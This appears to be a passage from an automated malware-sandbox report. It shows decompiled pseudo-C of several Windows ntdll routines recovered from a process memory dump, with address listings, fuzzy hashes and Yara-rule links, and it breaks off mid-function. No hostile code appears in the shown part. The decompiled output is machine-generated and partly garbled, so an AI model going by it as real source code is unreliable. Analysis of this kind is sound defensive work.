                                                                                                                                0x04f6391d
                                                                                                                                0x04f63922
                                                                                                                                0x04f63926
                                                                                                                                0x00000000
                                                                                                                                0x04f63928
                                                                                                                                0x04f6392b
                                                                                                                                0x04f6392b
                                                                                                                                0x04f63935
                                                                                                                                0x04f63937
                                                                                                                                0x04f63937
                                                                                                                                0x00000000
                                                                                                                                0x04f63935
                                                                                                                                0x04f63926
                                                                                                                                0x04f638f0
                                                                                                                                0x00000000

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: BinaryName
                                                                                                                                • API String ID: 2994545307-215506332
                                                                                                                                • Opcode ID: 76de2b7699bcafe266e5f7a4d5032e61f7c2d67ed0a82407bf2b7dc321dbd0a3
                                                                                                                                • Instruction ID: 6ceeabae06af727ecb17d86cff4119b21f5010e2e2a1e2ceeaee1bf640345888
                                                                                                                                • Opcode Fuzzy Hash: 76de2b7699bcafe266e5f7a4d5032e61f7c2d67ed0a82407bf2b7dc321dbd0a3
                                                                                                                                • Instruction Fuzzy Hash: 0C31E572E00519AFEB25DE58C945E6BB7B5EB80720F014169ED1AA7690D730BE02DBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 33%
                                                                                                                                			E04F1D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4fdd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04F04120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04F2B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04F298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04F295D0();
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                                0x04f1d29c
                                                                                                                                0x04f1d2a6
                                                                                                                                0x04f1d2b1
                                                                                                                                0x04f1d2b5
                                                                                                                                0x04f1d2b6
                                                                                                                                0x04f1d2bc
                                                                                                                                0x04f1d2bd
                                                                                                                                0x04f1d2be
                                                                                                                                0x04f1d2bf
                                                                                                                                0x04f1d2c2
                                                                                                                                0x04f1d2c4
                                                                                                                                0x04f1d2cc
                                                                                                                                0x04f1d384
                                                                                                                                0x04f1d34b
                                                                                                                                0x04f1d34f
                                                                                                                                0x04f1d350
                                                                                                                                0x04f1d351
                                                                                                                                0x04f1d35c
                                                                                                                                0x04f1d35c
                                                                                                                                0x04f1d2d6
                                                                                                                                0x04f1d2da
                                                                                                                                0x04f1d2e1
                                                                                                                                0x04f1d361
                                                                                                                                0x04f1d369
                                                                                                                                0x04f1d36d
                                                                                                                                0x04f1d2e3
                                                                                                                                0x04f1d2e3
                                                                                                                                0x04f1d2e3
                                                                                                                                0x04f1d2e5
                                                                                                                                0x04f1d2ed
                                                                                                                                0x04f1d2f5
                                                                                                                                0x04f1d2fa
                                                                                                                                0x04f1d302
                                                                                                                                0x04f1d303
                                                                                                                                0x04f1d30b
                                                                                                                                0x04f1d30f
                                                                                                                                0x04f1d313
                                                                                                                                0x04f1d318
                                                                                                                                0x04f1d31c
                                                                                                                                0x04f1d320
                                                                                                                                0x04f1d379
                                                                                                                                0x04f1d37d
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5affe
                                                                                                                                0x04f5b001
                                                                                                                                0x04f5b011
                                                                                                                                0x00000000
                                                                                                                                0x04f1d322
                                                                                                                                0x04f1d322
                                                                                                                                0x04f1d330
                                                                                                                                0x04f1d337
                                                                                                                                0x04f1d35d
                                                                                                                                0x04f1d339
                                                                                                                                0x04f1d33f
                                                                                                                                0x04f1d38c
                                                                                                                                0x04f1d38c
                                                                                                                                0x04f1d33f
                                                                                                                                0x04f1d349
                                                                                                                                0x00000000
                                                                                                                                0x04f1d349

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                • Opcode ID: ff452febfd8ec755439e8fe2125474c979ce703dbddcfa0a552fb1c7e19016fd
                                                                                                                                • Instruction ID: b9e769c655f4ad57c4f90f5bebbc9d35323b00cbe3a2f43f9d9a8e66822da37b
                                                                                                                                • Opcode Fuzzy Hash: ff452febfd8ec755439e8fe2125474c979ce703dbddcfa0a552fb1c7e19016fd
                                                                                                                                • Instruction Fuzzy Hash: 8C3193B26083459FD311DF28C98095BBBF8EBC5754F000A2EF99483260E639FD06DB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EF1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 72%
                                                                                                                                			E04EF1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04F2BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04F2A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04F2A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04F04620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                                                0x04ef1b8f
                                                                                                                                0x04ef1b9a
                                                                                                                                0x04ef1b9c
                                                                                                                                0x04ef1b9e
                                                                                                                                0x04ef1ba3
                                                                                                                                0x04f47010
                                                                                                                                0x04f47010
                                                                                                                                0x00000000
                                                                                                                                0x04ef1ba9
                                                                                                                                0x04ef1ba9
                                                                                                                                0x04ef1bae
                                                                                                                                0x00000000
                                                                                                                                0x04ef1bc5
                                                                                                                                0x04ef1bca
                                                                                                                                0x04ef1bcf
                                                                                                                                0x04ef1bd0
                                                                                                                                0x04ef1bd1
                                                                                                                                0x04ef1bd2
                                                                                                                                0x04ef1bd6
                                                                                                                                0x04ef1bdc
                                                                                                                                0x04ef1be0
                                                                                                                                0x04f46ffc
                                                                                                                                0x04f47000
                                                                                                                                0x00000000
                                                                                                                                0x04f47006
                                                                                                                                0x04f47009
                                                                                                                                0x04f47009
                                                                                                                                0x04ef1be6
                                                                                                                                0x04ef1bec
                                                                                                                                0x04ef1c0b
                                                                                                                                0x04ef1c0b
                                                                                                                                0x04ef1c0c
                                                                                                                                0x04ef1c11
                                                                                                                                0x04ef1c12
                                                                                                                                0x04ef1c15
                                                                                                                                0x04ef1c1b
                                                                                                                                0x04ef1c1f
                                                                                                                                0x04ef1c31
                                                                                                                                0x04ef1c33
                                                                                                                                0x04f47026
                                                                                                                                0x04f47026
                                                                                                                                0x04ef1c21
                                                                                                                                0x04ef1c24
                                                                                                                                0x04ef1c24
                                                                                                                                0x04ef1bee
                                                                                                                                0x04ef1bee
                                                                                                                                0x04ef1bf2
                                                                                                                                0x04ef1c3a
                                                                                                                                0x04ef1bf4
                                                                                                                                0x04ef1bf4
                                                                                                                                0x04ef1c05
                                                                                                                                0x04ef1c05
                                                                                                                                0x04ef1c09
                                                                                                                                0x04ef1c3e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef1c09
                                                                                                                                0x04ef1bec
                                                                                                                                0x04ef1be0
                                                                                                                                0x04ef1bae
                                                                                                                                0x04ef1c2e

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: WindowsExcludedProcs
                                                                                                                                • API String ID: 0-3583428290
                                                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                • Instruction ID: 45fabf16970da0e1e3eb2c98e0dda1c2f008edc9f7ceba4d9cf3851ad78e0a45
                                                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                • Instruction Fuzzy Hash: 1A21B676A0112CEBDB25DE998D40F9BFBA9EBC1B54F054465AA049B200FB31FD0197A1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F0F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F0F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                                                0x04f0f71d
                                                                                                                                0x04f0f722
                                                                                                                                0x04f0f726
                                                                                                                                0x04f54770
                                                                                                                                0x04f0f765
                                                                                                                                0x04f0f769
                                                                                                                                0x04f0f769
                                                                                                                                0x04f0f732
                                                                                                                                0x04f5477a
                                                                                                                                0x00000000
                                                                                                                                0x04f5477a
                                                                                                                                0x04f0f738
                                                                                                                                0x04f0f73a
                                                                                                                                0x04f0f73c
                                                                                                                                0x04f0f73f
                                                                                                                                0x04f0f746
                                                                                                                                0x04f0f778
                                                                                                                                0x04f0f7a9
                                                                                                                                0x04f0f7a9
                                                                                                                                0x04f0f754
                                                                                                                                0x04f0f75a
                                                                                                                                0x04f0f75d
                                                                                                                                0x04f0f75f
                                                                                                                                0x04f0f761
                                                                                                                                0x04f0f76f
                                                                                                                                0x04f0f771
                                                                                                                                0x04f0f771
                                                                                                                                0x04f0f76f
                                                                                                                                0x04f0f763
                                                                                                                                0x00000000
                                                                                                                                0x04f0f763
                                                                                                                                0x04f0f77d
                                                                                                                                0x04f0f7a3
                                                                                                                                0x04f0f7a5
                                                                                                                                0x00000000
                                                                                                                                0x04f0f7a5
                                                                                                                                0x04f0f77f
                                                                                                                                0x04f0f782
                                                                                                                                0x04f0f784
                                                                                                                                0x04f0f786
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f0f788
                                                                                                                                0x04f0f748
                                                                                                                                0x04f0f74d
                                                                                                                                0x04f0f78d
                                                                                                                                0x04f0f793
                                                                                                                                0x04f0f7b7
                                                                                                                                0x04f0f7bc
                                                                                                                                0x00000000
                                                                                                                                0x04f0f7bc
                                                                                                                                0x04f0f798
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f0f79d
                                                                                                                                0x04f0f7b0
                                                                                                                                0x00000000
                                                                                                                                0x04f0f7b0
                                                                                                                                0x04f0f79f
                                                                                                                                0x00000000
                                                                                                                                0x04f0f74f
                                                                                                                                0x04f0f74f
                                                                                                                                0x00000000
                                                                                                                                0x04f0f74f

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Actx
                                                                                                                                • API String ID: 0-89312691
                                                                                                                                • Opcode ID: 7de990fc1cb4dfe8426dc1859590b98bad0dbf2ad1dc89748ee2eea4a41741ea
                                                                                                                                • Instruction ID: b0d00ef153e1aa7899117aeb5701c67b17ae7c99ff4ee6541950a158d731bc12
                                                                                                                                • Opcode Fuzzy Hash: 7de990fc1cb4dfe8426dc1859590b98bad0dbf2ad1dc89748ee2eea4a41741ea
                                                                                                                                • Instruction Fuzzy Hash: 9B119036B046028BEF348E1D85907367295ABD5724F24C52AE861CB3D1EBF0F843B362
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F98DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 71%
                                                                                                                                			E04F98DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4fc0d50);
				E04F3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04F75720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04F3DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04F3DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04F3D130(_t34, _t39, _t40);
			}





                                                                                                                                0x04f98df1
                                                                                                                                0x04f98df1
                                                                                                                                0x04f98df1
                                                                                                                                0x04f98df1
                                                                                                                                0x04f98df1
                                                                                                                                0x04f98df1
                                                                                                                                0x04f98df3
                                                                                                                                0x04f98df8
                                                                                                                                0x04f98dfd
                                                                                                                                0x04f98e00
                                                                                                                                0x04f98e0e
                                                                                                                                0x04f98e2a
                                                                                                                                0x04f98e36
                                                                                                                                0x04f98e38
                                                                                                                                0x04f98e3c
                                                                                                                                0x04f98e46
                                                                                                                                0x04f98e46
                                                                                                                                0x04f98e36
                                                                                                                                0x04f98e50
                                                                                                                                0x04f98e56
                                                                                                                                0x04f98e59
                                                                                                                                0x04f98e5c
                                                                                                                                0x04f98e60
                                                                                                                                0x04f98e67
                                                                                                                                0x04f98e6d
                                                                                                                                0x04f98e73
                                                                                                                                0x04f98e74
                                                                                                                                0x04f98eb1
                                                                                                                                0x04f98ebd

                                                                                                                                Strings
                                                                                                                                • Critical error detected %lx, xrefs: 04F98E21
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Critical error detected %lx
                                                                                                                                • API String ID: 0-802127002
                                                                                                                                • Opcode ID: e32087a835f405c4564ce4590f44a39039df168774f1d56950a772c069835018
                                                                                                                                • Instruction ID: 9f4de9ff28bfca76e6b7a202ca8a3f225d7d9a7c43090e702a8b19503bed0741
                                                                                                                                • Opcode Fuzzy Hash: e32087a835f405c4564ce4590f44a39039df168774f1d56950a772c069835018
                                                                                                                                • Instruction Fuzzy Hash: 421179B1D10349DBEF24EFA889057DCBBB0AB05355F20421ED469AB281C3346A03CF14
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F7FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04F7FF60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                • API String ID: 0-1911121157
                                                                                                                                • Opcode ID: d1543975a7d51dbd4611fa114300847680023b143054ac91ef0318cf4687c526
                                                                                                                                • Instruction ID: 336f74d458c65b6425a812e349073c7ca44ad7d4468f8647dd300033a9d94b3b
                                                                                                                                • Opcode Fuzzy Hash: d1543975a7d51dbd4611fa114300847680023b143054ac91ef0318cf4687c526
                                                                                                                                • Instruction Fuzzy Hash: B011ED71910548EFEB22EF60CD48FD8B7B2FB08719F548144E1086B2A0CB3DB942DB60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB5BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 88%
                                                                                                                                			E04FB5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4fc1178);
				E04F3D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04FB4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04F2D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04FB5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4fd60e8;
								if( *0x4fd60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4fd60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04F29710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
